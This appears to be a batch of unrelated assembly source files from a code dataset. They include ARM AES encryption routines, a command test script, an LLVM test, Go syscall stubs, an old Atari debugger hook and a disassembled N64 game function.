vld1.32 {q9},[r7] @ re-pre-load rndkey[1]
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
veor q6,q0,q7
bhs Loop_cbc_enc
vst1.8 {q6},[r1]!
b Lcbc_done
.align 5
Lcbc_enc128:
vld1.32 {q2,q3},[r7]
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
b Lenter_cbc_enc128
Loop_cbc_enc128:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vst1.8 {q6},[r1]!
Lenter_cbc_enc128:
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
subs r2,r2,#16
.byte 0x04,0x03,0xb0,0xf3 @ aese q0,q2
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
moveq r8,#0
.byte 0x06,0x03,0xb0,0xf3 @ aese q0,q3
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x24,0x03,0xb0,0xf3 @ aese q0,q10
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x26,0x03,0xb0,0xf3 @ aese q0,q11
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
vld1.8 {q8},[r0],r8
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
veor q8,q8,q5
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
veor q6,q0,q7
bhs Loop_cbc_enc128
vst1.8 {q6},[r1]!
b Lcbc_done
.align 5
Lcbc_dec:
vld1.8 {q10},[r0]!
subs r2,r2,#32 @ bias
add r6,r5,#2
vorr q3,q0,q0
vorr q1,q0,q0
vorr q11,q10,q10
blo Lcbc_dec_tail
vorr q1,q10,q10
vld1.8 {q10},[r0]!
vorr q2,q0,q0
vorr q3,q1,q1
vorr q11,q10,q10
Loop3x_cbc_dec:
.byte 0x60,0x03,0xb0,0xf3 @ aesd q0,q8
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x62,0x03,0xb0,0xf3 @ aesd q0,q9
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q9},[r7]!
bgt Loop3x_cbc_dec
.byte 0x60,0x03,0xb0,0xf3 @ aesd q0,q8
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q4,q6,q7
subs r2,r2,#0x30
veor q5,q2,q7
movlo r6,r2 @ r6, r6, is zero at this point
.byte 0x62,0x03,0xb0,0xf3 @ aesd q0,q9
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q9,q3,q7
add r0,r0,r6 @ r0 is adjusted in such way that
@ at exit from the loop q1-q10
@ are loaded with last "words"
vorr q6,q11,q11
mov r7,r3
.byte 0x68,0x03,0xb0,0xf3 @ aesd q0,q12
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x68,0x23,0xb0,0xf3 @ aesd q1,q12
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x68,0x43,0xf0,0xf3 @ aesd q10,q12
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q2},[r0]!
.byte 0x6a,0x03,0xb0,0xf3 @ aesd q0,q13
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x6a,0x23,0xb0,0xf3 @ aesd q1,q13
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6a,0x43,0xf0,0xf3 @ aesd q10,q13
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q3},[r0]!
.byte 0x6c,0x03,0xb0,0xf3 @ aesd q0,q14
.byte 0xc0,0x03,0xb0,0xf3 @ aesimc q0,q0
.byte 0x6c,0x23,0xb0,0xf3 @ aesd q1,q14
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6c,0x43,0xf0,0xf3 @ aesd q10,q14
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.8 {q11},[r0]!
.byte 0x6e,0x03,0xb0,0xf3 @ aesd q0,q15
.byte 0x6e,0x23,0xb0,0xf3 @ aesd q1,q15
.byte 0x6e,0x43,0xf0,0xf3 @ aesd q10,q15
vld1.32 {q8},[r7]! @ re-pre-load rndkey[0]
add r6,r5,#2
veor q4,q4,q0
veor q5,q5,q1
veor q10,q10,q9
vld1.32 {q9},[r7]! @ re-pre-load rndkey[1]
vst1.8 {q4},[r1]!
vorr q0,q2,q2
vst1.8 {q5},[r1]!
vorr q1,q3,q3
vst1.8 {q10},[r1]!
vorr q10,q11,q11
bhs Loop3x_cbc_dec
cmn r2,#0x30
beq Lcbc_done
nop
Lcbc_dec_tail:
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
vld1.32 {q9},[r7]!
bgt Lcbc_dec_tail
.byte 0x60,0x23,0xb0,0xf3 @ aesd q1,q8
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x60,0x43,0xf0,0xf3 @ aesd q10,q8
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
.byte 0x62,0x23,0xb0,0xf3 @ aesd q1,q9
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x62,0x43,0xf0,0xf3 @ aesd q10,q9
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
.byte 0x68,0x23,0xb0,0xf3 @ aesd q1,q12
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x68,0x43,0xf0,0xf3 @ aesd q10,q12
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
cmn r2,#0x20
.byte 0x6a,0x23,0xb0,0xf3 @ aesd q1,q13
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6a,0x43,0xf0,0xf3 @ aesd q10,q13
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q5,q6,q7
.byte 0x6c,0x23,0xb0,0xf3 @ aesd q1,q14
.byte 0xc2,0x23,0xb0,0xf3 @ aesimc q1,q1
.byte 0x6c,0x43,0xf0,0xf3 @ aesd q10,q14
.byte 0xe4,0x43,0xf0,0xf3 @ aesimc q10,q10
veor q9,q3,q7
.byte 0x6e,0x23,0xb0,0xf3 @ aesd q1,q15
.byte 0x6e,0x43,0xf0,0xf3 @ aesd q10,q15
beq Lcbc_dec_one
veor q5,q5,q1
veor q9,q9,q10
vorr q6,q11,q11
vst1.8 {q5},[r1]!
vst1.8 {q9},[r1]!
b Lcbc_done
Lcbc_dec_one:
veor q5,q5,q10
vorr q6,q11,q11
vst1.8 {q5},[r1]!
Lcbc_done:
vst1.8 {q6},[r4]
Lcbc_abort:
vldmia sp!,{d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!,{r4,r5,r6,r7,r8,pc}
.globl _aes_v8_ctr32_encrypt_blocks
#ifdef __thumb2__
.thumb_func _aes_v8_ctr32_encrypt_blocks
#endif
.align 5
_aes_v8_ctr32_encrypt_blocks:
mov ip,sp
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,lr}
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI specification says so
ldr r4, [ip] @ load remaining arg
ldr r5,[r3,#240]
ldr r8, [r4, #12]
vld1.32 {q0},[r4]
vld1.32 {q8,q9},[r3] @ load key schedule...
sub r5,r5,#4
mov r12,#16
cmp r2,#2
add r7,r3,r5,lsl#4 @ pointer to last 5 round keys
sub r5,r5,#2
vld1.32 {q12,q13},[r7]!
vld1.32 {q14,q15},[r7]!
vld1.32 {q7},[r7]
add r7,r3,#32
mov r6,r5
movlo r12,#0
#ifndef __ARMEB__
rev r8, r8
#endif
vorr q1,q0,q0
add r10, r8, #1
vorr q10,q0,q0
add r8, r8, #2
vorr q6,q0,q0
rev r10, r10
vmov.32 d3[1],r10
bls Lctr32_tail
rev r12, r8
sub r2,r2,#3 @ bias
vmov.32 d21[1],r12
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x20,0x43,0xf0,0xf3 @ aese q10,q8
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x22,0x43,0xf0,0xf3 @ aese q10,q9
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.32 {q9},[r7]!
bgt Loop3x_ctr32
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x83,0xb0,0xf3 @ aesmc q4,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0xa3,0xb0,0xf3 @ aesmc q5,q1
vld1.8 {q2},[r0]!
vorr q0,q6,q6
.byte 0x20,0x43,0xf0,0xf3 @ aese q10,q8
.byte 0xa4,0x43,0xf0,0xf3 @ aesmc q10,q10
vld1.8 {q3},[r0]!
vorr q1,q6,q6
.byte 0x22,0x83,0xb0,0xf3 @ aese q4,q9
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x22,0xa3,0xb0,0xf3 @ aese q5,q9
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
vld1.8 {q11},[r0]!
mov r7,r3
.byte 0x22,0x43,0xf0,0xf3 @ aese q10,q9
.byte 0xa4,0x23,0xf0,0xf3 @ aesmc q9,q10
vorr q10,q6,q6
add r9,r8,#1
.byte 0x28,0x83,0xb0,0xf3 @ aese q4,q12
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x28,0xa3,0xb0,0xf3 @ aese q5,q12
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
veor q2,q2,q7
add r10,r8,#2
.byte 0x28,0x23,0xf0,0xf3 @ aese q9,q12
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
veor q3,q3,q7
add r8,r8,#3
.byte 0x2a,0x83,0xb0,0xf3 @ aese q4,q13
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x2a,0xa3,0xb0,0xf3 @ aese q5,q13
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
veor q11,q11,q7
rev r9,r9
.byte 0x2a,0x23,0xf0,0xf3 @ aese q9,q13
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
vmov.32 d1[1], r9
rev r10,r10
.byte 0x2c,0x83,0xb0,0xf3 @ aese q4,q14
.byte 0x88,0x83,0xb0,0xf3 @ aesmc q4,q4
.byte 0x2c,0xa3,0xb0,0xf3 @ aese q5,q14
.byte 0x8a,0xa3,0xb0,0xf3 @ aesmc q5,q5
vmov.32 d3[1], r10
rev r12,r8
.byte 0x2c,0x23,0xf0,0xf3 @ aese q9,q14
.byte 0xa2,0x23,0xf0,0xf3 @ aesmc q9,q9
vmov.32 d21[1], r12
subs r2,r2,#3
.byte 0x2e,0x83,0xb0,0xf3 @ aese q4,q15
.byte 0x2e,0xa3,0xb0,0xf3 @ aese q5,q15
.byte 0x2e,0x23,0xf0,0xf3 @ aese q9,q15
veor q2,q2,q4
vld1.32 {q8},[r7]! @ re-pre-load rndkey[0]
vst1.8 {q2},[r1]!
veor q3,q3,q5
mov r6,r5
vst1.8 {q3},[r1]!
veor q11,q11,q9
vld1.32 {q9},[r7]! @ re-pre-load rndkey[1]
vst1.8 {q11},[r1]!
bhs Loop3x_ctr32
adds r2,r2,#3
beq Lctr32_done
cmp r2,#1
mov r12,#16
moveq r12,#0
Lctr32_tail:
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.32 {q8},[r7]!
subs r6,r6,#2
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.32 {q9},[r7]!
bgt Lctr32_tail
.byte 0x20,0x03,0xb0,0xf3 @ aese q0,q8
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x20,0x23,0xb0,0xf3 @ aese q1,q8
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
.byte 0x22,0x03,0xb0,0xf3 @ aese q0,q9
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x22,0x23,0xb0,0xf3 @ aese q1,q9
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.8 {q2},[r0],r12
.byte 0x28,0x03,0xb0,0xf3 @ aese q0,q12
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x28,0x23,0xb0,0xf3 @ aese q1,q12
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
vld1.8 {q3},[r0]
.byte 0x2a,0x03,0xb0,0xf3 @ aese q0,q13
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2a,0x23,0xb0,0xf3 @ aese q1,q13
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
veor q2,q2,q7
.byte 0x2c,0x03,0xb0,0xf3 @ aese q0,q14
.byte 0x80,0x03,0xb0,0xf3 @ aesmc q0,q0
.byte 0x2c,0x23,0xb0,0xf3 @ aese q1,q14
.byte 0x82,0x23,0xb0,0xf3 @ aesmc q1,q1
veor q3,q3,q7
.byte 0x2e,0x03,0xb0,0xf3 @ aese q0,q15
.byte 0x2e,0x23,0xb0,0xf3 @ aese q1,q15
cmp r2,#1
veor q2,q2,q0
veor q3,q3,q1
vst1.8 {q2},[r1]!
beq Lctr32_done
vst1.8 {q3},[r1]
Lctr32_done:
vldmia sp!,{d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,pc}
#endif
| {
"language": "Assembly"
} |
# This is a script containing a set of commands to execute via the Gse scripting API.
# Run it by entering: run_ref_cmds.sh test_cmds.txt
CMD_NO_OP # No-op command
CMD_NO_OP_STRING, "A string" # No-op with string
SB_START_PKTS # Start sending packets
SB_INJECT_PKT_ERROR # inject an error
| {
"language": "Assembly"
} |
; RUN: opt < %s -instcombine -disable-output
define float @test(<4 x float> %V) {
%V2 = insertelement <4 x float> %V, float 1.000000e+00, i32 3 ; <<4 x float>> [#uses=1]
%R = extractelement <4 x float> %V2, i32 2 ; <float> [#uses=1]
ret float %R
}
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, DragonFly
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
***********************************
*=================================*
* RESERVOIR GODS LIBRARY ROUTINES *
*=================================*
* | | *
* |DISK_OS LIBRARY | *
* | | *
***********************************
* CODE: MR. PINK | (C): 28/07/96 *
***********************************
SECTION CSECT
xdef rlbssd_open
xdef rlbssd_close
xref rlbssd_new_set_screen
**************************************************************************
SECTION TEXT
**************************************************************************
rlbssd_bss_debug_constructor:
movem.l a0-2,-(a7)
cmp.l #"BSSD",$40.w
bne .notins
tst.l $44.w
beq .notins
move.l $44.w,a0
move.w #$67f8,$4324(a0)
move.w #$4ef9,$4332(a0)
lea rlbssd_new_set_screen,a1
move.l a1,$4332+2(a0)
lea $830(a0),a2
lea 18(a2),a1
move.l -(a2),-(a1)
move.l -(a2),-(a1)
move.w -(a2),-(a1)
lea $4332(a0),a2
move.l a2,-(a1)
move.l #$426e0058,-(a1)
move.w #$23fc,-(a1)
addq.w #4,a2
move.l a2,-(a1)
move.l #$33fc4e75,-(a1)
clr.l $40.w
clr.l $44.w
.notins
movem.l (a7)+,a0-2
rts
rlbssd_bss_debug_deconstructor:
clr.l $40.w
clr.l $44.w
rts
| {
"language": "Assembly"
} |
glabel func_80A75C38
/* 01928 80A75C38 27BDFFB0 */ addiu $sp, $sp, 0xFFB0 ## $sp = FFFFFFB0
/* 0192C 80A75C3C AFBF0024 */ sw $ra, 0x0024($sp)
/* 01930 80A75C40 AFB00020 */ sw $s0, 0x0020($sp)
/* 01934 80A75C44 AFA50054 */ sw $a1, 0x0054($sp)
/* 01938 80A75C48 908202F8 */ lbu $v0, 0x02F8($a0) ## 000002F8
/* 0193C 80A75C4C 24010003 */ addiu $at, $zero, 0x0003 ## $at = 00000003
/* 01940 80A75C50 00808025 */ or $s0, $a0, $zero ## $s0 = 00000000
/* 01944 80A75C54 104100CD */ beq $v0, $at, .L80A75F8C
/* 01948 80A75C58 24010002 */ addiu $at, $zero, 0x0002 ## $at = 00000002
/* 0194C 80A75C5C 504100CC */ beql $v0, $at, .L80A75F90
/* 01950 80A75C60 8FBF0024 */ lw $ra, 0x0024($sp)
/* 01954 80A75C64 908E03FD */ lbu $t6, 0x03FD($a0) ## 000003FD
/* 01958 80A75C68 3C040600 */ lui $a0, 0x0600 ## $a0 = 06000000
/* 0195C 80A75C6C 31CF0080 */ andi $t7, $t6, 0x0080 ## $t7 = 00000000
/* 01960 80A75C70 51E00016 */ beql $t7, $zero, .L80A75CCC
/* 01964 80A75C74 920A0331 */ lbu $t2, 0x0331($s0) ## 00000331
/* 01968 80A75C78 0C028800 */ jal SkelAnime_GetFrameCount
/* 0196C 80A75C7C 2484485C */ addiu $a0, $a0, 0x485C ## $a0 = 0600485C
/* 01970 80A75C80 44822000 */ mtc1 $v0, $f4 ## $f4 = 0.00
/* 01974 80A75C84 3C014000 */ lui $at, 0x4000 ## $at = 40000000
/* 01978 80A75C88 44814000 */ mtc1 $at, $f8 ## $f8 = 2.00
/* 0197C 80A75C8C 468021A0 */ cvt.s.w $f6, $f4
/* 01980 80A75C90 C60A0164 */ lwc1 $f10, 0x0164($s0) ## 00000164
/* 01984 80A75C94 46083001 */ sub.s $f0, $f6, $f8
/* 01988 80A75C98 4600503C */ c.lt.s $f10, $f0
/* 0198C 80A75C9C 00000000 */ nop
/* 01990 80A75CA0 45020003 */ bc1fl .L80A75CB0
/* 01994 80A75CA4 921803FD */ lbu $t8, 0x03FD($s0) ## 000003FD
/* 01998 80A75CA8 E6000164 */ swc1 $f0, 0x0164($s0) ## 00000164
/* 0199C 80A75CAC 921803FD */ lbu $t8, 0x03FD($s0) ## 000003FD
.L80A75CB0:
/* 019A0 80A75CB0 92080331 */ lbu $t0, 0x0331($s0) ## 00000331
/* 019A4 80A75CB4 3319FF7F */ andi $t9, $t8, 0xFF7F ## $t9 = 00000000
/* 019A8 80A75CB8 3109FFFD */ andi $t1, $t0, 0xFFFD ## $t1 = 00000000
/* 019AC 80A75CBC A21903FD */ sb $t9, 0x03FD($s0) ## 000003FD
/* 019B0 80A75CC0 100000B2 */ beq $zero, $zero, .L80A75F8C
/* 019B4 80A75CC4 A2090331 */ sb $t1, 0x0331($s0) ## 00000331
/* 019B8 80A75CC8 920A0331 */ lbu $t2, 0x0331($s0) ## 00000331
.L80A75CCC:
/* 019BC 80A75CCC 26020024 */ addiu $v0, $s0, 0x0024 ## $v0 = 00000024
/* 019C0 80A75CD0 314B0002 */ andi $t3, $t2, 0x0002 ## $t3 = 00000000
/* 019C4 80A75CD4 516000AE */ beql $t3, $zero, .L80A75F90
/* 019C8 80A75CD8 8FBF0024 */ lw $ra, 0x0024($sp)
/* 019CC 80A75CDC 8C4E0000 */ lw $t6, 0x0000($v0) ## 00000024
/* 019D0 80A75CE0 27AC0038 */ addiu $t4, $sp, 0x0038 ## $t4 = FFFFFFE8
/* 019D4 80A75CE4 3C014248 */ lui $at, 0x4248 ## $at = 42480000
/* 019D8 80A75CE8 AD8E0000 */ sw $t6, 0x0000($t4) ## FFFFFFE8
/* 019DC 80A75CEC 8C4D0004 */ lw $t5, 0x0004($v0) ## 00000028
/* 019E0 80A75CF0 44819000 */ mtc1 $at, $f18 ## $f18 = 50.00
/* 019E4 80A75CF4 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 019E8 80A75CF8 AD8D0004 */ sw $t5, 0x0004($t4) ## FFFFFFEC
/* 019EC 80A75CFC 8C4E0008 */ lw $t6, 0x0008($v0) ## 0000002C
/* 019F0 80A75D00 26050338 */ addiu $a1, $s0, 0x0338 ## $a1 = 00000338
/* 019F4 80A75D04 24060001 */ addiu $a2, $zero, 0x0001 ## $a2 = 00000001
/* 019F8 80A75D08 AD8E0008 */ sw $t6, 0x0008($t4) ## FFFFFFF0
/* 019FC 80A75D0C C7B0003C */ lwc1 $f16, 0x003C($sp)
/* 01A00 80A75D10 AFA20030 */ sw $v0, 0x0030($sp)
/* 01A04 80A75D14 46128100 */ add.s $f4, $f16, $f18
/* 01A08 80A75D18 0C00D594 */ jal func_80035650
/* 01A0C 80A75D1C E7A4003C */ swc1 $f4, 0x003C($sp)
/* 01A10 80A75D20 920F00B1 */ lbu $t7, 0x00B1($s0) ## 000000B1
/* 01A14 80A75D24 92180331 */ lbu $t8, 0x0331($s0) ## 00000331
/* 01A18 80A75D28 2401000D */ addiu $at, $zero, 0x000D ## $at = 0000000D
/* 01A1C 80A75D2C 31E200FF */ andi $v0, $t7, 0x00FF ## $v0 = 00000000
/* 01A20 80A75D30 3319FFFD */ andi $t9, $t8, 0xFFFD ## $t9 = 00000000
/* 01A24 80A75D34 A2190331 */ sb $t9, 0x0331($s0) ## 00000331
/* 01A28 80A75D38 1040000A */ beq $v0, $zero, .L80A75D64
/* 01A2C 80A75D3C A20F02FD */ sb $t7, 0x02FD($s0) ## 000002FD
/* 01A30 80A75D40 10410008 */ beq $v0, $at, .L80A75D64
/* 01A34 80A75D44 00000000 */ nop
/* 01A38 80A75D48 920802FB */ lbu $t0, 0x02FB($s0) ## 000002FB
/* 01A3C 80A75D4C 2401000E */ addiu $at, $zero, 0x000E ## $at = 0000000E
/* 01A40 80A75D50 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01A44 80A75D54 15000009 */ bne $t0, $zero, .L80A75D7C
/* 01A48 80A75D58 24054000 */ addiu $a1, $zero, 0x4000 ## $a1 = 00004000
/* 01A4C 80A75D5C 54410008 */ bnel $v0, $at, .L80A75D80
/* 01A50 80A75D60 2409000C */ addiu $t1, $zero, 0x000C ## $t1 = 0000000C
.L80A75D64:
/* 01A54 80A75D64 10400089 */ beq $v0, $zero, .L80A75F8C
/* 01A58 80A75D68 8FA40054 */ lw $a0, 0x0054($sp)
/* 01A5C 80A75D6C 0C018B58 */ jal func_80062D60
/* 01A60 80A75D70 27A50038 */ addiu $a1, $sp, 0x0038 ## $a1 = FFFFFFE8
/* 01A64 80A75D74 10000086 */ beq $zero, $zero, .L80A75F90
/* 01A68 80A75D78 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75D7C:
/* 01A6C 80A75D7C 2409000C */ addiu $t1, $zero, 0x000C ## $t1 = 0000000C
.L80A75D80:
/* 01A70 80A75D80 AFA90010 */ sw $t1, 0x0010($sp)
/* 01A74 80A75D84 240600FF */ addiu $a2, $zero, 0x00FF ## $a2 = 000000FF
/* 01A78 80A75D88 0C00D09B */ jal func_8003426C
/* 01A7C 80A75D8C 00003825 */ or $a3, $zero, $zero ## $a3 = 00000000
/* 01A80 80A75D90 920300AF */ lbu $v1, 0x00AF($s0) ## 000000AF
/* 01A84 80A75D94 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01A88 80A75D98 0C00D58A */ jal Actor_ApplyDamage
/* 01A8C 80A75D9C A3A30049 */ sb $v1, 0x0049($sp)
/* 01A90 80A75DA0 860A001C */ lh $t2, 0x001C($s0) ## 0000001C
/* 01A94 80A75DA4 93A30049 */ lbu $v1, 0x0049($sp)
/* 01A98 80A75DA8 1140000E */ beq $t2, $zero, .L80A75DE4
/* 01A9C 80A75DAC 2861000B */ slti $at, $v1, 0x000B
/* 01AA0 80A75DB0 1420000A */ bne $at, $zero, .L80A75DDC
/* 01AA4 80A75DB4 AFA30030 */ sw $v1, 0x0030($sp)
/* 01AA8 80A75DB8 920C00AF */ lbu $t4, 0x00AF($s0) ## 000000AF
/* 01AAC 80A75DBC 240D0001 */ addiu $t5, $zero, 0x0001 ## $t5 = 00000001
/* 01AB0 80A75DC0 26040308 */ addiu $a0, $s0, 0x0308 ## $a0 = 00000308
/* 01AB4 80A75DC4 2981000B */ slti $at, $t4, 0x000B
/* 01AB8 80A75DC8 10200004 */ beq $at, $zero, .L80A75DDC
/* 01ABC 80A75DCC 24050003 */ addiu $a1, $zero, 0x0003 ## $a1 = 00000003
/* 01AC0 80A75DD0 A20D02FB */ sb $t5, 0x02FB($s0) ## 000002FB
/* 01AC4 80A75DD4 0C00CB89 */ jal func_80032E24
/* 01AC8 80A75DD8 8FA60054 */ lw $a2, 0x0054($sp)
.L80A75DDC:
/* 01ACC 80A75DDC 1000001F */ beq $zero, $zero, .L80A75E5C
/* 01AD0 80A75DE0 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
.L80A75DE4:
/* 01AD4 80A75DE4 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
/* 01AD8 80A75DE8 8FA40054 */ lw $a0, 0x0054($sp)
/* 01ADC 80A75DEC 02003025 */ or $a2, $s0, $zero ## $a2 = 00000000
/* 01AE0 80A75DF0 2841000B */ slti $at, $v0, 0x000B
/* 01AE4 80A75DF4 10200010 */ beq $at, $zero, .L80A75E38
/* 01AE8 80A75DF8 24851C24 */ addiu $a1, $a0, 0x1C24 ## $a1 = 00001C24
/* 01AEC 80A75DFC 0C00CDD2 */ jal Actor_ChangeType
/* 01AF0 80A75E00 24070009 */ addiu $a3, $zero, 0x0009 ## $a3 = 00000009
/* 01AF4 80A75E04 8FA40054 */ lw $a0, 0x0054($sp)
/* 01AF8 80A75E08 8FA50030 */ lw $a1, 0x0030($sp)
/* 01AFC 80A75E0C 24060014 */ addiu $a2, $zero, 0x0014 ## $a2 = 00000014
/* 01B00 80A75E10 0C01AEB6 */ jal Audio_PlaySoundAtPosition
/* 01B04 80A75E14 2407388B */ addiu $a3, $zero, 0x388B ## $a3 = 0000388B
/* 01B08 80A75E18 86050302 */ lh $a1, 0x0302($s0) ## 00000302
/* 01B0C 80A75E1C 240100FF */ addiu $at, $zero, 0x00FF ## $at = 000000FF
